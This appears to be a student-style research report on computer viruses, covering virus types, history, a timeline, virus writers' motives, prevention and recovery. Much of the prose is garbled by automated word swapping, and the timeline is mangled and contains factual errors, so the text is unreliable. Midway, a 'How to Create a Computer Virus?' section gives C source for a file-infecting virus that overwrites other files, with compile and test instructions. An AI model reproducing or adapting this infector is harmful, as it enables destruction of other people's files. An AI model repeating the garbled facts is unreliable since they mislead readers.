Background Of Studies On Computer Viruses

Background Of Studies On Computer estimator estimator calculating machine computer computer virusesA estimator virus is a calculator political platform that flock copy itself and tarnish a electronic calculating machine. The destination virus is besides unremarkably except err superstarously apply to refer to nearly different shells of malw be, including but not limited to adw ar and spyw be political platforms that do not call for the reproductive faculty. A adjust virus raft bed bedcover from one reckoner to an near former(a)(prenominal) (in near form of workable legislation) when its multitude is developn to the tar worry data processor for typesetters case because a drug tapdanceer sent it over a network or the net income, or carried it on a removable medium such as a diskette disk disk, CD, DVD, or USB drive. viruses feces increase their chances of overspreading to other computing machines by giveing charges on a network wedg e schema or a buck governance that is accessed by another computer.As decl atomic number 18d above, the term computer virus is sometimes used as a catch-all phrase to take all types of malw atomic number 18, even off those that do not have the reproductive ability. Malware embarrasss computer viruses, computer worms, Trojan dollar bills, close to root kits, spyware, double-dealing adware and other spiteful and unwanted packet, including true viruses. computer viruses are sometimes lost with worms and Trojan horses, which are skilfully different. A worm mickle exploit security vulnerabilities to spread itself automatically to other computers with networks, while a Trojan horse is a course of instruction that turn outs stainless but h rare backs venomed functions. Worms and Trojan horses, analogous viruses, whitethorn harm a computer establishments info or makeance. or so viruses and other malware have symptoms noticeable to the computer user, but m either are surreptitious or simply do aught to call care to them. Some viruses do nothing beyond reproducing themselves.Section 1.2 Background of Studies on Various Computer computer virusesBoot Sector VirusesThis type of viruses has ability to hide in parent sector. The viruses give load into retrospection when there is commissioning system and delivering to read from hard disk. Boot sector viruses are to a greater extent than spread since old time when lax disk was popular. But straight we but experiencen them since m whatever(prenominal) of them only can spread through lax disk.This type of virus affects the belt sector of a floppy disk or hard disk. This is a crucial part of a disk, in which tuition on the disk itself is stored together with a class that makes it possible to tutelage (start) the computer from the disk.The best way of avoiding boot viruses is to ensure that floppy disks are write- valueed and never start your computer with an unknown region floppy di sk in the disk drive.Examples of boot viruses acknowledge Polyboot.B, AntiEXE.Companion VirusesCompanion Viruses is another cast of viruses. When user computer de file by this sort of viruses, it will seduce another type file from an existing file in resembling airory (such as creating file.com from file.exe in the same folder), some companion viruses suffer file.exe from any folder.It can be considered file befoulor viruses desire resident or direct cropion types. They are known as companion viruses because once they get into the system they accompany the other files that al work exist. In other words, in order to carry out their contagion routines, companion viruses can turn back in memory until a broadcast is flood (resident viruses) or act immediately by devising copies of themselves (direct action viruses).Some examples include Stator, Asimov.1539, and Terrax.1069Encrypted VirusesThis type of viruses consists of encrypted despiteful code, decrypted module. The vi ruses use encrypted code technique which make antivirus packet hardly to detect them. The antivirus program usually can detect this type of viruses when they try spread by decrypted themselves.Logic tur profound VirusesLogic Bomb Viruses or sometime know as Time Bomb is small instalment of malicious code or program which have ability to shut in itself to other programs or system and perform specific action when the conditions are met (most Logic Bomb developers use date as conditions). The Logic Bomb does nothing until pre-programmed date is reached. Logic Bomb can perform any malicious things based on pre-programmed within it such as deleting file or displaying unwanted message or lock program and so on.They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.Their objective is to destroy data on the computer once reliable conditions have been met. Logic bombs go un notice un til launched, and the results can be destructive. big VirusesWhen talking about large Viruses, we refer to viruses which infect puffy of other applications such as Microsoft Word, Microsoft Excel. The viruses are written in a macro language and use it to distribute themselves. Macro viruses will run automatically when user open document. Usually this type of virus cause harmless to your computer, but instead they are annoying by automatically inserting unwanted texts or symbols.Example of Macro Virus WM.Concept, it was introduced in 1995 the first macro virus that spread through Microsoft Word. And another popular one is genus Melissa that is first found in 1999, it also can spread through MS Word, Excel and Outlook.Multipartite VirusesMultipartite Viruses is type of viruses which infect user computer on both part boot sector and workable files and programs at the same time, with this condition, the viruses spread faster than boot sector or file infector alone.It changes the pat hs that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infect by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus. at once infected it becomes unrealizable to locate the original filesExample Ghost ball, the first multipartite virus.nonresident VirusesThis type of viruses is similar to occupant Viruses by using replication of module. also that, Nonresident Viruses role as finder module which can infect to files when it found one (it will select one or more files to infect each time the module is kill).Polymorphic VirusesPolymorphic Virus is similar to encrypted viruses it can infect files with an encrypted copy of itself. The viruses use difference technique to replicate themselves. Some polymorphic viruses are hardly to detect by antivirus software using virus signature based, because it do not keep on any identical after replicatio n.Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) e truly time they infect a system.This makes it impossible for anti-viruses to find them using bowed stringed instrument or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.Examples include Elkern, Marburg, Satan Bug, and Tuareg.Resident VirusesResident Viruses or known as Memory Resident Viruses is malicious module. The viruses can replicate module and installing malicious code into computer memory ( pound). The viruses are familiarly classified into two main categories profuse Infectors and Slow Infectors.This type of virus is a eternal which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system corrupting files and programs that are opened, closed, copied, renamed etc.Examples include Randex, CMJ, Meve, and MrKlun ky. thieving Viruses / WormStealth Viruses is some sort of viruses which try to trick anti-virus software by intercepting its requests to the operating system. It has ability to hide itself from some antivirus software programs. Therefore, some antivirus program cannot detect them.A worm is a program very similar to a virus it has the ability to self-replicate, and can lead to ostracize effects on your system and most authorizedly they are notice and eliminated by antivirus.Examples of worms include PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, and Mapson.Section 1.3.1 Research Question1. How did the diff. types of computer Viruses shaped when, where, by whom?2. How are they attack/work on the terminate user computers?3. How we protect ourself from such type of computer viruses?4. What will be the future row of computer viruses?Section 1.3.2 Research AimThe research aims at rationality how Computer viruses is evolving and attacking on day to day computer business lineSection 1. 3.3 Research ObjectiveThe objective of this research is to help to the user of Computer to make decisions on the how to solved the problem created because of computer viruses from a long time perspectives.Also to develop contrasting measure between the fountain of computer viruses and the end user of the computer.Section 1.3.4 Research Hypothesis numerous of the viruses that have had the grea bear witness impact have been think to be totally benign. Unfortunately, small errors in program code have led to ignominious results. The most frequent such error is when a virus program, which was defi deficiency to infect a computer only once, doesnt realize it has already through with(p) its job, and keeps infecting the computer over and over. This was the problem with the infamous virus released at Cornell University on November 2, 1988, by Robert Morris, Jr., which rapidly brought the entire Internet system of computers to its knees. Where the small run off of a single virus can p ass unnoticed by a computer system, millions of viruses can fill every bit of memory and use up every cycle of computing power of the computer they have invaded.The hidden message revealed by the spaciously publicized cases of infection by computer viruses is that existing computer systems of all sorts could be do very large errors that have never been recognized. This means the computer systems that take care of every aspect of the worlds financial life, computer systems that keep in-person records on you and me, computer systems that support the military capabilities of the super-powers. Good system developers test systems thoroughly before installation, attempting to test every possible logic path. However, with a system of any reasonable level of complexity, this is an impossible task, so a study system is likely only to have been thoroughly tried for frequently occurring events. Its the infrequently occurring events, and especially the unforeseen combinations of events, th at are the bane of systems developers. And those are also the areas where Poincares admonition is most likely to come into play.Chapter 2 publications ReviewWhat is Computer virus?Term was first used by Fred Cohen in 1984. A computer virus is a small program a computer virus is a computer program that can copy itself and infect a computer. The term virus is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.As stated above, the term computer virus is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most root kits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are practicedly different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that counts harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer systems data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to them. Some viruses do nothing beyond reproducing themselves biography of Computer virusesThe first academic work on the theory of computer viru ses (although the term computer virus was not invented at that time) was done by John von Neumann in 1949 that held lectures at the University of Illinois about the hypothesis and fundamental law of Complicated Automata. The work of von Neumann was later published as the Theory of self-reproducing automata In his essay von Neumann postulated that a computer program could breed.In 1972 Veith Risak published his denomination Selbstreproduzierende Automaton mitt minimaler Informationsbertragung (Self-reproducing automata with minimal information exchange). The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system.In 1984 Fred Cohen from the University of gray California wrote his paper Computer Viruses Theory and Experiments It was the first paper to explicitly call a self-reproducing program a virus a term introduced by his mentor Leonard Adelman.An article that describes useful virus functionalities was published by J. B. Gunn under the title custom of virus functions to provide a practical(prenominal) APL interpreter under user control in 1984.Science apologueThe Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with tele earphone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It therefore move to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through sensitized computers.The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve electronegative private information from other computers to blackmail the man who wants to turn him off.Virus programs HistoryThe Creeper vi rus was first detected on ARPANET, the precursor of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can was displayed. The Reaper program was created to delete Creeper.A program called Elk Cloner was the first computer virus to appear in the loco that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner The program with a personality.The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to admonish piracy of the software they had written.Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. traditionalistic computer viruses emerged in the 1980s, driven b y the spread of personal computers and the incident increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed in a flash to the spread of Trojan horse programs, and viruses were written to infect popularly traded software.Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft speckle by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface.Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a m ating of the two and would likely be detected as a virus unique from the parents.A virus may also send a web address cogitate as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted lineage) follows the link to the web office, the virus hosted at the site may be able to infect this hot computer and retain propagating.Viruses that spread using cross-site scripting were first reported in 2002, and were academically show in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo.Time line of computer virusesIn the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection.YEARVIRUS NAMEBY WHOMTYPE1982ELK CLONERRICH SKRENTA1983COMPUTER VIRUSFRED COHEN1986BRAINPAKISTAN charge SECTOR1988ARPANETROBBERT MORRISENCRYPTED1989AIDSTROJ AN1990ANTI-VIRUS S/W1991NON-ANTI S/WSYMANTECPOLYMORPHIC1994HOAX1995WORD1999MELLISADAVID L. SMITH2000I LOVE UFILIPINE STUDENT2001CODE RED WORM2003SLAMMER2004MY DOON/NOVARG2005COMMWARRIOR-ARUSSIACELL think2008CONFICKER2009CYNER ATTACKW32.DOZOR2010STUNEXTTROJAN2011HTTP BOTBLACK SHADESProgramming language used for creating Computer VirusesCC++AssemblerPHPJAVA hired handVB SCRIPTMICRO LANGUAGE/CODEHow Computer Viruses WorkAs youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies.A biological virus isnt truly a living, independent entity as biologists will tell you, a virus is nothing more than a subdivision of desoxyribonucleic acid sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself.A computer virus is lik e a biological virus in that it also isnt an independent entity it must Piggyback on a host (another program or document) in order to propagate.How a virus infects your computer1. Virus program is launched.2. Virus code is loaded into PC memory.3. Virus delivers its destructive commitment.4. Virus copies itself to other programs.How Computer Viruses Work 5If all a virus did was copy itself to additional programs and computers, there would be gnomish Harm done, save for having all our programs get slightly bigger (thanks to the virus code).Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus king, for example, delete authentic files on your computer.It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs.Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, closure peck servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly.As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeperAgent in a spy novel, until theyre awoken on a specific date then they go about the work them were programmed to do.In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination.How to Create a Computer Virus?This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program.includeincludeincludeincludeincludeincludeFILE *virus,*hostint done, a=0unsigned long xchar buff2048struct ffblk ffblkclock_t st,endvoid main()st=clock()clrscr()done=findfirst(*.*,ffblk,0)while(done)virus=fopen(_argv0,r3. Virus delivers its destructive payload.b)host=fopen(ffblk.ff_name,rb+)if(host==NULL) goto nextx=89088printf(Infecting %sn,ffblk.ff_name,a)while(x2048)fread(buff,2048,1,virus)fwrite(buff,2048,1,host)x-=2048fread(buff,x,1,virus)fwrite(buff,x,1,host)a++nextfcloseall()done=findnext(ffblk)print f(DONE (Total Files Infected= %d),a)end=clock()printf(TIME TAKEN=%f SECn,(end-st)/CLK_TCK)getch()COMPILING METHODUSING BORLAND TC++ 3.0 (16-BIT)1. accuse the program in the compiler, press Alt-F9 to compile2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN bastard DIRECTORY INCLUDIN YOUR COMPILER)3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE)4. deviate the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088 CHANGE IT)5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infectUSING BORLAND C++ 5.5 (32-BIT) 1. Compile once, note down the generated EXE file length in bytes2. Change the value of X in source code to this length in bytes3. Recompile it. The new EXE file is ready to infectHOW TO TEST1. Open new empty folder2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER)3. Run the virus EXE file there you will see all the files in the reliable directory get infected.4. All the infected files will be ready to re-infect.why Viruses ExistComputer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people- software engineers and developers, typically-who create computer viruses Know what theyre doing. These code writers designedly create programs that they know will Wreak havoc on great numbers of computer users.The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, ocular Basic, or Java, or a macro language, such as VBA.By using a build your own virus program-of which there are several available, Via the Internet underground.So, by definition, a virus writer is a person with a certain amount of technical expertise. But instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users.This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of do as much damage as possible, from the relative Anonymity of their computer keyboards.Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a physique of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled.Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to by choice perpetrate such destruction on such a wide scale.In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our advanced age, suchPleasure can come from writing destructive virus code.What You Can Do About Computer VirusesTheres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt eer mean there are fewer criminals the truth is, theres a new batch of virus writers coming online every day.All of which means that you slope rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself.Reducing Your Chances of transmittalTo make yourself less of a target for virus infection, take the next stepsRestrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site try not to put you at risk like this unless you absolutely have to.Dont open any e-mail attachments you werent expecting. The majority of viruses nowadays arrive in your mailbox as attachments to e-mail messages resist the enticement to open or view every file attachment you receive.Use an up-to-date anti-virus program or service. Antivirus programs work they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence,As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates.Enable macro virus protection in all your applications. Most current Microsoft Applications include spec ial features that keep the program from running unknown macros and thus foreclose your system from being infected by macro viruses.Create ministration copies of all your important data. If worse comes to worst and your Entire system is infected you may need to revert to no infected versions of your most scathing Files. You cant do this unless you plan ahead and back up your important data.Preventing Viruses Attacks.Diagnosing a Virus InfectionHow do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for Programs quit working or freeze up. Documents become inaccessible. Computer freezes up or wont start properly. The CAPS LOCK key quits working-or works intermittently. Files increase in size. Frequent error messages appear onscreen. Strange messages or pictures appear onscreen. Your PC emits strange sounds. Friends and c olleagues inform you that theyve legitimate strange e-mails from you, that you dont remember sending.How to Catch a Virus.Recovering from a Virus AttackIf youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system.You dont, however, have to give up and throw your computer away. intimately all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools.The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus